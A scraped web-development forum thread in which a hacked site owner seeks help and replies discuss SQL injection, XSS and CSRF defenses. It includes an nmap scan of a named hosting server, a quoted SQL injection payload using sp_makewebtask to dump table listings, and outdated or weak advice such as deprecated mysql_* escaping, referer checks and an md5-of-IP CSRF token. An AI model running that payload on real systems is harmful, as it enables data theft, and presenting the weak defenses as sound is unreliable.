Menu
Been hacked by some philipinos, and apparently it was “easy”.
no idea how though.
a list of what they did:
Changed site title (stored in the database)
changed the Email address of every single user to their site url.
made every user’s session id the same and every user’s ip address the same.
sessions are cookie based and trawling through the database has shown me no evidence of an sql injection.
i’m completely lost, my logs are less than useful.
any ideas?
[code=php]$sql = mysql_query("SELECT username FROM users WHERE user_id=".(int)$_POST['user_id']." AND password='".mysql_real_escape_string($_POST['password'])."'");[/code]
[code=php]
function clean_db_input($input){
return mysql_real_escape_string($input);
}
[/code]
[code=php]function clean($string)
{
return htmlentities(mysql_real_escape_string($string));
}[/code]
[code=php]mysql_real_escape_string("$string","$db_conn");[/code]
[CODE]
Interesting ports on bajor.servers.rbl-mer.misp.co.uk (188.65.115.2):
Not shown: 90 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp PureFTPd
53/tcp closed domain
80/tcp open http Apache httpd 2.2.14 ((Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5...)
110/tcp open pop3 Courier pop3d
143/tcp open imap Courier Imapd (released 2008)
443/tcp open http Apache httpd 2.2.14 ((Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5...)
587/tcp closed submission
990/tcp closed ftps
993/tcp open ssl/imap Courier Imapd (released 2008)
995/tcp open ssl/pop3 Courier pop3d
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.74 seconds
[/CODE]
[CODE]
even though it's hosted with a domain of misp, it's likely 2host.co.uk.
[/CODE]
[code=php]$post = (int) ($_GET['post']); #this can still end up being negative, are all post #'s positive?[/code]
[code=php]$message = mysql_real_escape_string($_POST['message']); <-- prevents SQL-Injection, doesn't guarantee your query will still run
INSERT INTO posts (message) values ('$message');[/code]
[code=php]
SELECT message ...blah blah blah...
to let your users safely view the message (get rid of javascript):
echo html_entities('$message'); <-- prevents XSS attacks (may have to transform what you're looking to replace w/ a table)
[/code]
[code=php]'; EXEC master..sp_makewebtask "\10.10.1.3shareoutput.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"[/code]
Both are web application attacks, they've been getting common over the past years.[/QUOTE]
Another thing to be on the lookout for if you use AJAX. XSRF attacks, to stop the bulk of them is quite easy though, you set a cookie with a randomly generated id and then on AJAX calls you send that id along with it. On your PHP page you would make sure that the cookie id is equal to the sent id.[/QUOTE]
actually you can block those ajax attacks by checking the http ref, anyone who spoofs that will figure out they need to stop it for the application to work (or you can just have the page return an error message explaining to stop that). It also makes it very very difficult for an attacker to forge the http refer without first finding another webpage on your site thats vulnerable to reflective xss to redirect off of.
Using nonces it understandable, but it's too much to think about if you're going to code it by hand. It's also not entirely scalable. It requires the ajax for function in a specific way, which is almost never the case for me.[/QUOTE]
Can CSRF be prevented by implementing referrer checking?
No for two reasons.
First there are many ways that a Referer header can be blanked out or modified such as via web filtering software, parental control software, privacy software, proxies, or DOM trickery. This makes the referer header unreliable by nature.
Second Referer headers can be spoofed using XMLHTTP and by using flash as demonstrated by Amit Klein and rapid7. While these particular methods have been patched by the vendors, not every user visiting your website has applied these patches. Even if they did the first issue would still exist.
[/quote]
google hackers are bottom feeders, completely an opinion.[/QUOTE]
google hackers are bottom feeders, completely an opinion.
No my authentication is perfectly fine. You need a legitimate username and password to access any application. The applications are split and the authentication is handled by a central server. Once authenticated, they're authorized with the application.
My question is, how do I feed the client their first token?
So my legitimate client has no token, and logs in... still no token?
An attacker making use of an XSRF attack vector has no token, but piggy backs off of my client's session.
My client has no token.
The attacker has no token.
How do I give my legitimate client their first token/set of tokens, and what makes this method of delivery secure from an attacker? Should there be some level of encryption added, a series of challenges between the server and legitimate client.
Can XSRF attacks only be used to send information, not receive?[/QUOTE]
[code=php]
$users_ip = $_SERVER['REMOTE_ADDR'];
$secret_salt = "This is any string of text, values not imporant, it could be just random letters...";
// lets make a token
$token = md5( $users_ip.$secret_salt );
// DO a token test at this point, if it does not match, reject the page
[/code]
[code=html]...>
<form name="tokentest" action="./">
<input name="token" type="hidden" value="<?php echo $token?>" readonly>
<...[/code]
0.1.9 — BETA 6.18